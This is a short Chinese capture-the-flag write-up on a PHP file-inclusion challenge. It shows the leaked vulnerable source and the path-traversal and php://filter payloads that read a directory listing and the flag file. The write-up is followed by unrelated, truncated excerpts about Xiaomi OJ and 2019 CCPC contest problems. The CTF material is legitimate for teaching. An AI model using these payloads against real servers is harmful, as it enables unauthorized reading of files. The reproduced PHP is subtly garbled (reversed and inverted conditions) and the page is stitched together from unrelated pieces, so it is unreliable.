點進鏈結發現提示
include $_get['file
']
估計是檔案包含漏洞
嘗試包含index.php,發現一串base64編碼,解碼得到
<?php$a = @$_get['file'];
if (!$a
)
echo 'include $_get[\'file\']';
if (strpos('flag',$a)!==false
)
include
$a;
?>
繼續解碼hint,得到dir.php,繼續嘗試包含dir.php,又是一串base64,繼續解碼
<?php$a = @$_get['dir'];
if(!$a
) var_dump(scandir($a));
用dir引數遍歷目錄 dir.php?dir=../../../
讀取檔案 ?file=../../../ffffflag_1s_her4
或者繼續偽協議讀取?file=php://filter/read=convert.base64-encode/resource=../../../ffffflag_1s_her4 然後再base64解碼。
flag
小公尺OJ TCO 預選賽
其實粗糧oj比賽時間一直都很友好,就是題目太少,只有三題,而且質量都不咋地。a 講那麼多,答案就是k 2。隊友1分48秒切掉的題目 手速帝啊。太水就不貼 了。b 這道題題面錯漏百出,以下面為準 給定xoy平面上的n個整點,每對點 x1,y1 x2,y2 可以確定乙個矩形 矩形左上角點為 min x1...
2019CCPC網路預選賽解題報告
hdu 6709 fishing master hdu 6702 題目 hdu 6702 題意 給乙個a,b,輸出 a xor c b xor c 值最小的正整數c 型別 思維 思路 輸出a b,如果a b 0輸出1即可 includeusing namespace std define ll lo...
小公尺ICPC預選賽 A 數論,dp
題目大意 給你乙個序列a1,an a 1,a n a1 an 讓你從裡面選出乙個子集s ss,使得子集中任意兩個數都互為倍數.求最大子集.n 1 e5,a i 1e 7n leq 1e5,a i leq1e7 n 1e5,ai 1e7 題目思路 首先,本題的弱化版 整除關係具有傳遞性,所以任意兩個數...